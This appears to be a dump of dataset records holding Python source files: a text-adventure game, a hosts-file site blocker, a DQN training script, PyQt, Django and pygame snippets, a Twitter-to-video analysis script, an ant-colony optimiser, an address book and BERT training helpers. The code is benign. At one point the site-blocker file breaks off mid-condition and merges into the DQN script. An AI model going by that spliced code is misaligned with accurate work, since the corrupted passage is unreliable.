meet.',\n\t\t'Death!',\n\t\t'This isn\\'t that kind of bar. Think again']\n\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: return Boring()\n\t\tif path == 2: return Mystic()\n\t\tif path == 3: return Death()\t\t\n\t\t\nclass Mystic(Scene):\n\n\tdef enter(self):\n\t\tprint (\"There is an old mysterious woman. She looks unimaginably old.\") \n\t\tprint (\"It is said she can read people's futures.\")\n\t\tprint (\"She asks you: \\\"Tell me child, what path do you seek?\\\"\")\n\t\t\n\t\tpossible_answers = [\"path of peace\",\"path of truth\",\"path of honour\"]\n\t\tresponses = [\"Ah, perhaps you should grow a pair and pick up a sword?\",\n\t\t\"Truth you seek, I can give you all of the truth. Look into my crystal ball. Look deeper.\",\n\t\t\"Yes! A noble warrior I see inside of you. \\nTake this gem to the Blacksmith, and say the words: \\n\\\"Dawn rises, The Dark retreats, The Light shall shine again,\\\"\",\n\t\t\"The path you seek is not what I see for you. Choose again.\"]\n\t\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: return Boring()\n\t\tif path == 3: return Blacksmith()\n\t\tif path == 2: return Death()\n\t\t\nclass Blacksmith(Scene):\n\n\tdef enter(self):\n\t\tprint (\"You enter a blacksmith\")\n\t\tprint (\"Inside is a drunk old man\")\n\t\tprint (\"What do you say?\")\n\t\t\n\t\tpossible_answers = ['Dawn rises, The Dark retreats, The Light shall shine again',\n\t\t'Uh.. Corn rises, The Bark depletes, The Kite shall shine again?',\n\t\t'You stink of piss and booze, you\\'re a disgusting old man, what use could you be to me?']\n\t\tresponses = [\"Is that? No! 
It can\\'t be!\\nThe lost ruby from the Mighty Sword of Kanazin\",\n\t\t'Can\\'t you see I\\'m busy, piss off!',\n\t\t'Death!',\n\t\t'You\\'re talking bollocks mate!']\n\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: return Battle()\n\t\tif path == 2: return Boring()\n\t\tif path == 3: return Death()\n\t\t\nclass Battle(Scene):\n\n\tdef enter(self):\n\t\tprint (\"You here the sound of horses in the town square.\")\n\t\tprint (\"You here the sound of screaming and terror and death\")\n\t\tprint (\"What do you do?\")\n\t\t\n\t\tpossible_answers = ['Hide','Charge through the door with your mighty sword']\n\t\tresponses = ['You survive, but hundreds of innocent people died because you failed to save them',\n\t\t'You charge through the door and scream \\\"Behold! The Mighty Sword of Kanazin!!!\\\"',\n\t\t'Stop dillydallying, this is the most important decision of your life']\n\t\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 2: pass\n\t\tif path == 1: return Boring()\n\t\t\n\t\tprint (\"You are quickly surrounded by marauding villains\")\n\t\tprint (\"They are terrifying, wicked and blood-thirsty.\")\n\t\tprint (\"What do you do?\")\n\t\t\n\t\tpossible_answers = ['Swing your mighty sword in one foul swoop']\n\t\tresponses = ['The Mighty Sword decapitates all of the villains, their heads roll across the square, blood pools at your feet.',\n\t\t'Are you really a hero? There\\'s only one real choice!']\n\t\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: pass\n\t\t\n\t\tprint (\"The leader approaches, he is fully clad in jet black armour, darker than the night itself\")\n\t\tprint (\"He says \\\"Your puny sword will do nothing to me, no man can slay the mighty Black Knight\\\"\")\n\t\tprint (\"What do you do?\")\n\t\tpossible_answers = ['Swing your Mighty Sword anyway', 'Walk away', 'Challenge him to a game of Rock Paper Scissors']\n\t\tresponses = ['The sword bounces off his armour, he crushes your skull in his hand', 'He laughs, and kills everyone you ever loved', 'The Dark Knight never refuses a duel', 'Choose again']\n\t\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: return Death()\n\t\tif path == 2: return Boring()\n\t\tif path == 3: pass\n\t\t\n\t\tprint (\"You say: \\\"Let's make this more interesting\\\"\")\n\t\tprint (\"\\\"Lose 4 times and you die\\\"\")\n\t\tresult = combat.rps()\n\t\t\n\t\tif result == 1: return Death()\n\t\tif result == 2: pass\n\t\t\n\t\tprint (\"You win the game\")\n\t\texit(0)\n\t\t\n\t\t\n\t\t\nclass Engine(object):\n\n\tdef __init__(self, scene):\n\t\tself.scene = scene\n\t\t\n\tdef play(self):\n\t\t\n\t\tcurrent_scene = self.scene\n\t\t\n\t\twhile True:\n\t\t\n\t\t\tnew_scene = current_scene.enter()\n\t\t\tcurrent_scene = new_scene\n\t\t\n\t\t\n\t\t\nscene = Bar()\ngame = Engine(scene)\ngame.play()","sub_path":"courage.py","file_name":"courage.py","file_ext":"py","file_size_in_byte":5562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"267264816","text":"\r\nimport time\r\nfrom datetime import datetime as dt\r\n\r\nhosts_path=r\"C:\\Windows\\System32\\drivers\\etc\\hosts.ics\"\r\nredirect=\"127.0.0.1\"\r\nwebsite_list=[\"www.instagram.com\",\"www.facebook.com\",\"www.csgo.com\"]\r\nwith open(hosts_path,'r') as file:\r\n content_file=file.read()\r\n file.close()\r\nwhile 1:\r\n if (dt(dt.now().year,dt.now().month,dt.now().day,9)=200.0:\n print('\\nEnvironment solved in {:d} 
episodes!\\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))\n break\n torch.save(agent.qnetwork_local.state_dict(), 'checkpoint' + env_name + '.pth')\n return scores\n\nscores = dqn()\n\n# plot the scores\n# fig = plt.figure()\n# ax = fig.add_subplot(111)\n# plt.plot(np.arange(len(scores)), scores)\n# plt.ylabel('Score')\n# plt.xlabel('Episode #')\n# plt.show()\n\n\n# load the weights from file\nagent.qnetwork_local.load_state_dict(torch.load('checkpoint' + env_name + '.pth'))\nN = 10\nrewardsDQN = np.zeros((N,T))\nfor i in range(N):\n state = env.reset()\n rewards = []\n for step_index in range(T):\n action = agent.act(state)\n env.render()\n time.sleep(0.01)\n state, reward, done, _ = env.step(action.reshape(-1))\n rewardsDQN[i,step_index] = reward\n if done:\n print(\"Finished after iteration: \", step_index)\n break\n\nrewardsDQN = np.mean(rewardsDQN, axis=0)\nenv.close()\n\nplt.plot(np.cumsum(rewardsDQN), color='green', label='DQN Agent trained')\nplt.plot(np.cumsum(rewards), color='red', label='Untrained Agent')\nplt.show()\n","sub_path":"logs/mainDQN.py","file_name":"mainDQN.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"118564620","text":"# helper util methods \nimport json \nimport re\n\ndef clean_text(text):\n patterns = [\n \"((http(s)?(\\:\\/\\/))+(www\\.)?([\\w\\-\\.\\/])*(\\.[a-zA-Z]{2,3}\\/?))[^\\s\\b\\n|]*[^.,;:\\?\\!\\@\\^\\$ -]\"\n , \"#\"\n ]\n for pattern in patterns:\n text = re.sub(pattern, \"\", text, flags=re.MULTILINE)\n return text","sub_path":"helper/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"338430781","text":"'''\n\n树控件响应事件\n\n'''\n\nimport sys,math\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt, QStringListModel\n\n\nclass TreeEvent(QMainWindow):\n def __init__(self):\n super(TreeEvent, self).__init__()\n self.initUI()\n\n def initUI(self):\n self.resize(430, 230)\n self.setWindowTitle(\"树控件响应事件\")\n\n self.tree=QTreeWidget()\n self.tree.setColumnCount(2)\n self.tree.setHeaderLabels(['Key', 'Value'])\n root = QTreeWidgetItem(self.tree)\n root.setText(0, \"root\")\n root.setText(1,'0')\n\n child1=QTreeWidgetItem(root)\n child1.setText(0,'child1')\n child1.setText(1,'1')\n\n child2 = QTreeWidgetItem(root)\n child2.setText(0, 'child2')\n child2.setText(1, '2')\n\n child3 = QTreeWidgetItem(child2)\n child3.setText(0, 'child3')\n child3.setText(1, '3')\n\n self.tree.clicked.connect(self.onTreeClicked)\n self.setCentralWidget(self.tree)\n\n def onTreeClicked(self,index):\n item=self.tree.currentItem()\n print(index.row())\n print('key=%s,value=%s'%(item.text(0),item.text(1)))\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = TreeEvent()\n main.show()\n\n sys.exit(app.exec_())","sub_path":"src/table_tree/TreeEvent.py","file_name":"TreeEvent.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"281142023","text":"from django.db import transaction\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import render\n\nfrom products.models import Comments, Product\n\nUser = get_user_model()\nfrom django.contrib.contenttypes.models import ContentType\n\n\ndef get_children(qs_child):\n res = []\n for comment in qs_child:\n c = {\n 'id': 
comment.id,\n            'text': comment.text,\n            'timestamp': comment.timestamp.strftime('%Y-%m_%d %H:%m'),\n            'author': comment.user.first_name,\n            'is_child': comment.is_child,\n            'parent_id': comment.get_parent\n        }\n        if comment.children.exists():\n            c['children'] = get_children(comment.children.all())\n        res.append(c)\n    return res\n\n\ndef create_comments_tree(qs):\n    res = []\n    for comment in qs:\n        c = {\n            'id': comment.id,\n            'text': comment.text,\n            'timestamp': comment.timestamp.strftime('%Y-%m_%d %H:%m'),\n            'author': comment.user.first_name,\n            'is_child': comment.is_child,\n            'parent_id': comment.get_parent\n        }\n        if comment.children:\n            c['children'] = get_children(comment.children.all())\n        if not comment.is_child:\n            res.append(c)\n    return res\n\n\n","sub_path":"products/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"612463443","text":"import twitter\nimport json\nimport urllib.request\nimport os\nimport subprocess\nfrom google.cloud import videointelligence\nfrom google.oauth2 import service_account\nfrom google.protobuf.json_format import MessageToJson\n\nclass InvalidMediaException(Exception):\n    pass\n\nclass InvalidCredentialsException(Exception):\n\tpass\n\ndef get_timeline_media_urls(screen_name, count=200, exclude_replies=True): \n\t\"\"\"Get list of jpg urls found in media associated with tweets from a specific Twitter account's timeline\n\n    Args:\n        screen_name (str): Twitter screen name associated with desired timeline\n\n    Keyword Arguments (optional):\n        count (int): Number of tweets to look through (capped at 200 per api limits). Default 200.\n        exclude_replies (bool): Exclude media found in tweets where specified user only replied. Default: True\n\n    Returns:\n        list: All .jpg image urls found in the twitter feed, as strings. \n\n    \"\"\"\n\twith open(\"keys.dat\") as f:\n\t\tkeys = f.read().split()\n\ttry:\n\t\tapi = twitter.Api(consumer_key= keys[0],\n\t\t\t\t\tconsumer_secret=keys[1],\n\t\t\t\t\taccess_token_key=keys[2],\n\t\t\t\t\taccess_token_secret=keys[3])\n\texcept:\n\t\traise InvalidCredentialsException(\"Invalid twitter credentials\")\n\n\ttry:\n\t\tres = api.GetUserTimeline(screen_name=screen_name, count=count, trim_user=True, exclude_replies=exclude_replies)\n\texcept Exception as e:\n\t\traise e\n\timages = []\n\tfor tweet in res:\n\t\tjs = tweet._json[\"entities\"]\n\t\tif \"media\" in js.keys():\n\t\t\tfor media in js[\"media\"]:\n\t\t\t\tif media[\"media_url\"][-3:] == \"jpg\":\n\t\t\t\t\timages.append(media[\"media_url\"])\n\tif len(images) == 0:\n\t\traise InvalidMediaException(\"No valid media found for screen_name: \" + screen_name)\n\treturn images\n\ndef urls_to_movie(images, output=\"output.mp4\"):\n\t\"\"\"Generate local mp4 file from a list of urls, with 1 sec per image\n\n    Args:\n        images (list): List of images to include in movie, as strings\n\n\tKeyword Arguments (optional):\n        output: Output filename for the video. 
Default: output.mp4\n\n    Returns:\n        str: Output filename used by ffmpeg, in the event the provided filename was in use\n\n    \"\"\"\n\tcount = 0\n\twhile os.path.isfile(output):\n\t\toutput = output.split(\".\")[0] + \"(\" + str(count) + \").\" + output.split(\".\")[1]\n\t\tcount += 1\n\n\tfor i in range(len(images)):\n\t\ttry:\n\t\t\turllib.request.urlretrieve(images[i], \"tmp_{}.jpg\".format(str(i).zfill(4)))\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tfor i in range(len(images)):\n\t\ttry:\n\t\t\tsubprocess.call(('''ffmpeg -loop 1 -i tmp_{}.jpg -c:a libfdk_aac -ar 44100 -ac 2 -vf \"scale='if(gt(a,16/9),1280,-1)':'if(gt(a,16/9),-1,720)', pad=1280:720:(ow-iw)/2:(oh-ih)/2\" -c:v libx264 -b:v 10M -pix_fmt yuv420p -r 30 -shortest -avoid_negative_ts make_zero -fflags +genpts -t 1 tmp_{}.mp4''').format(str(i).zfill(4) , str(i).zfill(4)),\n\t\t\t\tcwd=os.path.dirname(os.path.realpath(__file__)), shell=True, env=dict(os.environ, PATH=\"C:/Users/johnidel/Downloads/ffmpeg-20180201-b1af0e2-win64-static/ffmpeg-20180201-b1af0e2-win64-static/bin\"))\n\t\texcept Exception as e:\n\t\t\traise e\n\n\twith open(\"tmp_files.txt\", \"w\") as f:\n\t\tfor i in range(len(images)):\n\t\t\tf.write(\"file 'tmp_{}.mp4'\\n\".format(str(i).zfill(4)))\n\n\ttry:\n\t\tsubprocess.call(\"ffmpeg -f concat -i tmp_files.txt \" + output,\n\t\t\tcwd=os.path.dirname(os.path.realpath(__file__)),\n\t\t\tshell=True,\n\t\t\tenv=dict(os.environ))\n\texcept Exception as e:\n\t\traise e\n\t\t\t\n\t#cleanup temp files\n\tfor i in range(len(images)):\n\t\tos.remove(\"tmp_{}.jpg\".format(str(i).zfill(4)))\n\t\tos.remove(\"tmp_{}.mp4\".format(str(i).zfill(4)))\n\tos.remove(\"tmp_files.txt\".format(str(i).zfill(4)))\n\n\treturn output\n\ndef video_analysis(filename):\n\t\"\"\"Generate list of labels for a specified mp4 file, using Google cloud video intelligence\n\n\tOutput is of the form: \n\t\t[{start: 0, end: 1, labels: [(\"cat\", .56), (\"animal>dog\", .2)]}]\n\t\tEach label is broken up as (category > category > ... > entity , confidence level)\n\n    Args:\n        filename (str): Filename of input .mp4 file\n\n    Returns:\n        list: list of segments and labels, sorted by start time of each shot\n\n    \"\"\"\n\tcredentials = service_account.Credentials.from_service_account_file(\n\t    'googe.dat')\n\ttry:\n\t\tclient = videointelligence.VideoIntelligenceServiceClient(\n\t\t\tcredentials=credentials\n\t\t)\n\texcept Exception as e:\n\t\traise e\n\n\ttry:\n\t\twith open(filename, \"rb\") as f:\n\t\t\tvideo_data = f.read()\n\texcept Exception as e:\n\t\traise e\n\n\ttry:\n\t\tresult = client.annotate_video(\n\t\t\tinput_content=video_data,\n\t\t\tfeatures=['LABEL_DETECTION'],\n\t\t).result()\n\texcept Exception as e:\n\t\traise e\n\n\treturn result\n\ndef get_twitter_media_analysis(screen_name, count=200, exclude_replies=True, output_name=\"output.mp4\", delete_movie=True):\n\t\"\"\"Generate list of labels from the video analysis of a specified user's Twitter timeline\n\n\tOutput is of the form: \n\t\t[{start: 0, end: 1, labels: [(\"cat\", .56), (\"animal>dog\", .2)]}]\n\t\tEach label is broken up as (category > category > ... > entity , confidence level)\n\n    Args:\n        screen_name (str): Twitter screen name associated with desired timeline\n\n    Keyword Arguments (optional):\n        count (int): Number of tweets to look through (capped at 200 per api limits). Default: 200\n        exclude_replies (bool): Exclude media found in tweets where specified user only replied. Default: True\n        output_name (str): Filename for the output .mp4 file. 
Default: output.mp4\n\t    delete_movie (bool): Specifies whether or not to remove the local file after analysis. Default: True\n\n    Returns:\n        list: list of segments and labels, sorted by start time of each shot\n\n    \"\"\"\n\timages = get_timeline_media_urls(screen_name, count, exclude_replies)\n\toutput_filename_actual = urls_to_movie(images, output=output_name)\n\tresult = video_analysis(output_filename_actual)\n\tif delete_movie:\n\t\tos.remove(output_name)\n\n\tanalysis_json = json.loads(MessageToJson(result)) \n\n\tsegments = dict()\n\t#only one video submitted\n\tfor shot_label in analysis_json[\"annotationResults\"][0][\"shotLabelAnnotations\"]:\n\t\tentity = [shot_label[\"entity\"][\"description\"]]\n\t\tif \"categoryEntities\" in shot_label.keys():\n\t\t\tfor category_entity in shot_label[\"categoryEntities\"]:\n\t\t\t\tentity.append(category_entity[\"description\"])\n\t\t\tentity = entity[::-1]\n\n\t\tentity = \">\".join(entity)\n\n\t\tfor segment in shot_label[\"segments\"]:\n\t\t\tseg = segment[\"segment\"]\n\t\t\ttime = (float(seg[\"startTimeOffset\"][:-1]), float(seg[\"endTimeOffset\"][:-1]))\n\t\t\tif time not in segments.keys():\n\t\t\t\tsegments[time] = dict(start=time[0], end=time[1], labels=[(entity, segment[\"confidence\"])])\n\t\t\telse:\n\t\t\t\tsegments[time][\"labels\"].append((entity, segment[\"confidence\"]))\n\n\tresults = []\n\tfor key in segments.keys():\n\t\tresults.append(segments[key])\n\tresults = sorted(results, key= lambda x: x[\"start\"])\n\t\n\treturn results\n\nif __name__ == \"__main__\":\n\tget_twitter_media_analysis(\"dannygarcia95\", count=100, delete_movie=False)\n","sub_path":"twitter_to_movie.py","file_name":"twitter_to_movie.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"510567770","text":"import pygame\npygame.init()\n\npygame.display.set_mode((500,500));\n\nrunning=True\n\nwhile running: #game loop begins\n    for event in pygame.event.get():\n        if event.type==pygame.QUIT:\n            running=False\n\n    pygame.display.update()\n\n\n","sub_path":"tuto1.py","file_name":"tuto1.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"512503372","text":"from ACO import ACO\nimport numpy as np\nimport random\nimport math\nimport time\n\nclass ANT:\n    def __init__(self, start_node, nodes, edges, edges_pheromones, MAX_COST=1000, MAX_STEPS=12, MAX_PHEROMONES=1000, MIN_PHEROMONES=1, REQUIRED_STEPS=None, target_node=None):\n\n        self.MAX_COST=MAX_COST\n\n        # Start node of the ANT\n        self.node = start_node\n\n        self.MAX_STEPS = MAX_STEPS\n        self.REQUIRED_STEPS = REQUIRED_STEPS\n        self.MIN_PHEROMONES = MIN_PHEROMONES\n        self.MAX_PHEROMONES = MAX_PHEROMONES\n        self.target_node = target_node\n\n        self.step = 0\n\n        # Dataset\n        self.nodes = nodes\n        self.edges = edges\n        self.edges_pheromones = edges_pheromones\n\n        # Edges the ANT already used\n        #\n        self.possible_edges = {\n            self.node.idx: self.edges[self.node.idx]\n        }\n\n        self.visited_nodes = set()\n\n        # Add start node to visited nodes\n        self.visited_nodes.add(self.node.idx)\n\n        self.visited_edges = []\n\n    def current_viable_edges(self):\n        viable_edges_unordered = [(self.node.idx, y) for y in range(len(self.possible_edges[self.node.idx]))\n                                  if y not in self.visited_nodes\n                                  and y != self.target_node.idx]\n\n        viable_edges_ordered = []\n        \n        # NOTE: ordering the edges by distance appears unfinished; 'distance' and\n        # 'viable_edges_ordered' are never used, and the unordered list is returned below.\n        for edge in viable_edges_unordered:\n            distance = self.edges[edge[0]][edge[1]]\n\n        return 
viable_edges_unordered\n\n\n def edge_cost_sum(self):\n return sum([self.edges[idxs[0]][idxs[1]] for idxs in self.visited_edges])\n\n\n def roulette_wheel(self):\n\n viable_edges = self.current_viable_edges()\n\n sum_pheromones = sum([self.edges_pheromones[viable_edge[0]][viable_edge[1]] for viable_edge in viable_edges])\n\n\n random_number = random.uniform(0, sum_pheromones)\n\n roulette_sum = 0\n for edge in viable_edges:\n roulette_sum += self.edges_pheromones[edge[0], edge[1]]\n\n if roulette_sum >= random_number:\n return edge\n\n\n\n\n\n def walk(self):\n\n while self.node != self.target_node:\n\n # Ant walks onto a edge\n current_edge = self.roulette_wheel()\n\n if current_edge is None:\n current_edge = (self.node.idx, self.target_node.idx)\n elif self.MAX_STEPS != None and self.MAX_STEPS -1 == self.step:\n current_edge = (self.node.idx, self.target_node.idx)\n\n self.visited_nodes.add(current_edge[1])\n self.visited_edges.append(current_edge)\n self.node = self.nodes[current_edge[1]]\n\n try:\n self.possible_edges[self.node.idx]\n except:\n self.possible_edges[self.node.idx] = self.edges[self.node.idx]\n\n self.step += 1\n\n return self.node\n\n def pheromones(self):\n # x ---- 200 ---- x ----- 400 ----- x ----- 100 ---- x ----- 2000 ---- x\n\n current_pheromones = 0\n current_cost = 0\n #score = 1000**(1-float(self.edge_cost_sum())/self.MAX_COST) # Score function\n\n\n for idx, v_edge in enumerate(self.visited_edges):\n\n #current_pheromones = current_pheromones + self.edges_pheromones[v_edge[0]][v_edge[1]]\n #current_cost = current_cost + self.edges[v_edge[0]][v_edge[1]]\n\n score = ((1 - 1) * self.edges_pheromones[v_edge[0]][v_edge[1]]) + (1 / self.edge_cost_sum())\n new_score = self.edges_pheromones[v_edge[0]][v_edge[1]] + score\n #score = 1000**(1-float(current_cost)/self.MAX_COST) # Score function\n #print(score)|\n\n #score = 1 * math.pow(self.edges_pheromones[v_edge[0]][v_edge[1]], 2) + 0.5\n #score = 1*math.pow(((1 - .90) * self.edges_pheromones[v_edge[0]][v_edge[1]]) + (1 / self.edge_cost_sum()),2)+0.5\n\n if new_score <= self.MIN_PHEROMONES:\n self.edges_pheromones[v_edge[0]][v_edge[1]] = self.MIN_PHEROMONES\n elif new_score >= self.MAX_PHEROMONES:\n self.edges_pheromones[v_edge[0]][v_edge[1]] = self.MAX_PHEROMONES\n else:\n self.edges_pheromones[v_edge[0]][v_edge[1]] = new_score\n\n\n","sub_path":"ACO/Ant.py","file_name":"Ant.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"251449705","text":"# Filename: address_book.py\n\n'''Create your own command-line address-book program using which you can browse, add,\nmodify, delete or search for your contacts such as friends, family and colleagues\nand their information such as email address and/or phone number. 
Details must\nbe stored for later retrieval.'''\n\n\nimport pickle, os\n\n# Path to our address book.\naddressbook_path =r'C:\\Users\\Akshay\\Desktop\\Python Code\\address_book.info'\n\n# Class for a contact.\nclass contact:\n def __init__(self,name,phone,email):\n self.name=name\n self.phone=phone\n self.email=email\n def add(self):\n global ab\n ab[self.name]=self\n def delete(self):\n global ab\n del ab[self.name]\n def modify(self):\n field=raw_input(\"Enter 0 to modify phone number or 1 to modify email ID: \")\n new=raw_input(\"Enter the new value for the field: \")\n if field=='0':\n self.phone=new\n elif field=='1':\n self.email=new\n else:\n print (\"Incorrect input!\")\n del new\n del field\n def display(self):\n print (\"Contact : {}\".format(self.name))\n print (\"Phone : {}\".format(self.phone))\n print (\"Email : {}\".format(self.email))\n print (\"\")\n\n\nif os.path.exists(addressbook_path):\n try:\n f = open(addressbook_path,'rb')\n ab = pickle.load(f)\n f.close()\n except EOFError:\n ab={}\nelse:\n ab={}\n\n\n# Chooses where the 'mode' variable is defined.\nwhile(True):\n mode = raw_input('\\nWelcome to your Address Book!\\nHere are your options:\\\n Browse, Add, Modify, Delete, Search or Exit?: ')\n print(\"\")\n # Switch statement detailing what mode we want to use our address book in.\n if mode == 'Browse':\n print(\"These are the contacts in your Address Book: \")\n print(\"\")\n for obj in ab.values():\n obj.display()\n \n elif mode == 'Add':\n name=raw_input(\"Enter the Name of the new contact: \")\n phone=raw_input(\"Enter the Phone# of the new contact: \")\n email=raw_input(\"Enter the Email of the new contact: \")\n p=contact(name,phone,email)\n p.add()\n \n \n elif mode == 'Modify':\n name= raw_input(\"Enter the name of the contact for which modification is to be made: \")\n if name in ab.keys():\n ab[name].modify()\n else:\n print (\"Contact does not exist.\")\n \n\n elif mode == 'Delete':\n name= raw_input(\"Enter the name of the contact which is to be deleted: \")\n if name in ab.keys():\n del ab[name]\n else:\n print(\"Contact does not exist.\")\n\n elif mode == 'Search':\n name= raw_input(\"Enter the name of the contact which is to be displayed: \") \n if name in ab.keys():\n ab[name].display()\n else:\n print(\"Contact does not exist.\")\n\n elif mode == 'Exit':\n break\n\n else:\n print('\\nTypo bro!\\n')\n\n f = open(addressbook_path,'wb')\n pickle.dump(ab,f)\n f.close()\n","sub_path":"address_book.py","file_name":"address_book.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"97888983","text":"import smart_open\nsmart_open.open = smart_open.smart_open\nfrom gensim.models.word2vec import Word2Vec\nimport gensim.downloader as api\nimport numpy as np\nimport torch\nimport json\nimport pandas as pd\nimport string\nimport pickle as pkl\nimport re\nfrom transformers import BertTokenizer, BertForSequenceClassification\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader, RandomSampler\nfrom torch.nn.utils.rnn import pad_sequence\nimport os\nimport random\nimport csv\n\nSEED = 2021\ntorch.manual_seed(SEED)\ntorch.cuda.manual_seed(SEED)\nrandom.seed(SEED)\nnp.random.seed(SEED)\n\ndef confusion_matrix(gt_list, pred_list):\n from sklearn.metrics import confusion_matrix\n confusion_mat = confusion_matrix(np.concatenate(gt_list,axis=0),np.concatenate(pred_list,axis=0))\n return confusion_mat\n\ndef test(model,\n test_loader,\n 
device = None,\n return_pred_list = False):\n \n # initialize running values\n model.eval()\n correct = 0\n total = 0\n pred_list = []\n gt_list = []\n with torch.no_grad():\n for i, data in enumerate(test_loader):\n #print(i)\n tokens_tensors, labels= data[0], data[1]\n tokens_tensors, labels = tokens_tensors.to(device), labels.to(device)\n outputs = model(tokens_tensors) \n pred = torch.argmax(outputs, 1) \n #labels = labels.cpu().detach().numpy()\n pred_list += [pred.cpu().detach().numpy()]\n gt_list += [labels.cpu().detach().numpy()] \n total += labels.size(0) \n labels = labels.reshape(-1)\n correct += (pred == labels).sum().item()\n\n \n if return_pred_list:\n return correct/total, confusion_matrix(gt_list, pred_list), pred_list\n return correct/total, confusion_matrix(gt_list, pred_list)\n\n\ndef eva_and_csv(model,\n dev_data, \n test_loader,\n device = None):\n \n # initialize running values\n model.eval()\n correct = 0\n total = 0\n pred_list = []\n gt_list = []\n with torch.no_grad():\n for i, data in enumerate(test_loader):\n #print(i)\n tokens_tensors = data\n tokens_tensors = tokens_tensors.to(device)\n outputs = model(tokens_tensors) \n pred = torch.argmax(outputs, 1)\n pred_list += [pred.cpu().detach().numpy()]\n\n pred_list_np = np.concatenate(pred_list)\n \n with open('round2_own_classifier_only_article_epoch_10_eval.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(['idx', 'context_idx', 'label'])\n data_dict={}\n label_idx = 0\n for data in dev_data:\n idx = data['idx']\n if idx not in data_dict:\n data_dict[idx] = {\n 'idx': idx,\n 'label': pred_list_np[label_idx]\n }\n label_idx += 1\n writer.writerow([idx, data['context_idx'], 'real' if data_dict[idx]['label'] else 'fake'])\n\n\ndef train(model,\n optimizer,\n train_loader,\n criterion = nn.CrossEntropyLoss(), \n epoch = 0 ,\n best_valid_loss = float(\"Inf\"),\n output_PATH = None, \n device = None):\n \n # initialize running values\n running_loss = 0.0\n valid_running_loss = 0.0\n global_step = 0\n train_loss_list = []\n valid_loss_list = []\n global_steps_list = []\n\n # training loop\n model.train()\n #for epoch in range(num_epochs):\n correct = 0\n total = 0\n for i, data in enumerate(train_loader):\n tokens_tensors, labels= data[0], data[1]\n tokens_tensors, labels = tokens_tensors.to(device), labels.to(device)\n outputs = model(tokens_tensors) \n loss = criterion(outputs, labels)\n pred = torch.argmax(outputs, 1)\n total += labels.size(0)\n labels = labels.reshape(-1)\n correct += (pred == labels).sum().item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # update running values\n running_loss += loss.item()\n global_step += 1\n #print(running_loss/global_step)\n torch.save(model, output_PATH+'/model_' + str(epoch) +'.pth')\n print('running loss:' + str(running_loss/global_step))\n print('train acc:', str(correct/total))\n return model","sub_path":"NLP_embedding/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"401588776","text":"from utils import cleaner, ddmdata\nimport os\nimport sys\nfrom more_itertools import unique_everseen as unique\n\nstartup_list = cleaner.clean(ddmdata.readcsv(sys.argv[1]))\nsl_name = sys.argv[1].replace('.csv', '')\nss_results = ddmdata.readcsv(sys.argv[2])\n\n#Initializes the result groups list and index dict which will group base URLs together\nresult_groups = []\nindex_dict = {}\ncurrent_index = 
0\n\n#Groups results of the same base URL in a list of lists\nfor result in ss_results:\n    base_url = result['base_url']\n    if base_url in index_dict:\n        result_groups[index_dict[base_url]].append(result)\n    else:\n        index_dict[base_url] = current_index\n        result_list = [result]\n        result_groups.append(result_list)\n        current_index += 1\n\nfinal_results = []\n\nfor result_group in result_groups:\n\n    final_result = {}\n    cnpj_list = []\n    facebook_list = []\n    linkedin_list = []\n    twitter_list = []\n    instagram_list = []\n    email_list = []\n\n    for result in result_group:\n\n        cnpj_list += result['cnpj_all'].split(',')\n        facebook_list += result['facebook_all'].split(',')\n        linkedin_list += result['linkedin_all'].split(',')\n        twitter_list += result['twitter_all'].split(',')\n        instagram_list += result['instagram_all'].split(',')\n        email_list += result['email_all'].split(',')\n\n        if len(result_group) == 1 or result['depth'] == '0':\n            final_result['Response'] = result['response']\n            final_result['base_url'] = result['base_url']\n            final_result['final_url'] = result['final_url']\n            if result['final_url']:\n                final_result['Site final'] = cleaner.clean_site(result['final_url'])\n        else:\n            final_result['Site'] = cleaner.clean_site(result['base_url'])\n\n    final_result['CNPJ'] = ','.join(sorted(list(unique(cnpj_list))))\n    final_result['Facebook'] = ','.join(sorted(list(unique(facebook_list))))\n    final_result['LinkedIn'] = ','.join(sorted(list(unique(linkedin_list))))\n    final_result['Twitter'] = ','.join(sorted(list(unique(twitter_list))))\n    final_result['Instagram'] = ','.join(sorted(list(unique(instagram_list))))\n    final_result['E-mail'] = ','.join(sorted(list(unique(email_list))))\n\n    